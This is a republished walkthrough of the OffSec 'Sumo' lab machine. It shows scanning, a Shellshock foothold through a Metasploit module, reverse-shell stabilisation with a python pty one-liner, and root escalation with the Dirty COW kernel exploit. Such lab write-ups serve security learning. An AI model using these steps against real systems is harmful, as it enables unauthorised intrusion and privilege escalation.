Hacking, Copy on Write Exploit, Cybersecurity

OffSec — Sumo Walkthrough

A walkthrough with my tactics, techniques, and procedures.

Reconnaissance/Scanning:

Let’s start things off with a network scan to see which ports are open and the services running on each.

$ nmap -A -O -sC -sV -p- <machine_IP>

Nmap scan results

Scanning for directories with Gobuster:

Gobuster results for port 80 scan

I couldn’t find any other directories with gobuster, no other hosts/subdomains, and I didn’t find any other ports open after scanning again.

I decided to use the tool Nikto to see if that could find anything.

$ nikto -h <machine_IP>

Nikto scan results

Very interesting, that scan found a potential attack vector using the shellshock exploit.

Initial foothold:

This time I’ll use Metasploit framework and try to get my foothold with that.

The module of choice is:

exploit(multi/http/apache_mod_cgi_bash_env_exec)

There are a few of the options to change when that module is selected.

RHOSTS – <machine_IP>
TARGETURI – hxxp://<machine_IP>/cgi-bin/test
LHOST - <attack_IP>
LPORT - <PORT_of_choice>

NOTE: make sure to not have a listener on the attack machine using the same port from LPORT. Also, don’t pick the same port as the SRVPORT option.

Got initial access!

Proof of reverse shell as www-data

I’ll be taking that flag now.

Proof of user flag

In order to get a standard shell and be able to navigate better/use more commands, I’ll run the shell command within meterpreter:

# initiates a standard shell
$ shell

# check which python is running, that way I can get a stable shell
$ which python

# one liner to make the shell stable
$ python -c 'import pty; pty.spawn("/bin/bash")'

Stabalized shell

Exploit:

I checked a few ways to escalate privileges such as: cronjobs, binaries/executables with the SUID bits, hidden folders, SSH directory, and lastly, I checked the version of Linux running on the machine.

Command showing the kernel version

I checked with searchsploit for exploits on that kernel version.

Snippet of searchsploit results

The results show that the machine is potentially vulnerable to CVE-2016–5195 which is the “dirty cow” kernel exploit. Info found here.

"A race condition was found in the way the Linux kernel's memory subsystem 

handled the copy-on-write (COW) breakage of private read-only memory mappings. 

An unprivileged local user could use this flaw to gain write access to 

otherwise read-only memory mappings and thus increase their privileges on the 

system."

Here’s a snippet via exploit-db[.]com from the code on how to be able to run it.

Snippet of how to use the exploit

I had to download the script to my machine, use Python to make another simple server, then grab it on the target machine and follow the directions to execute it.

NOTE: Whenever I am downloading anything to a machine that I’ve compromised, I’ll be in a directory that the compromised user can write to. (usually /tmp or /opt)

Script compiled and executed

Privilege Escalation:

The new user with root privileges is made via the script and now I can escalate to that user.

Proof of privilege escalation

Time to get that root flag!

Proof of root flag

Reporting:

• Keep all software and hardware patched and up to date with the latest security releases to prevent vulnerabilities.

Note from Publication: This story was uploaded at the permission of user “xocybersec” on 2/1/24. Please direct any feedback, comments, or citations to the original writer! Thank you — Infosec WatchTower

© [2024] Infosec WatchTower. All rights reserved. Unauthorized use or reproduction of content is prohibited. For inquiries, contact Infosec WatchTower.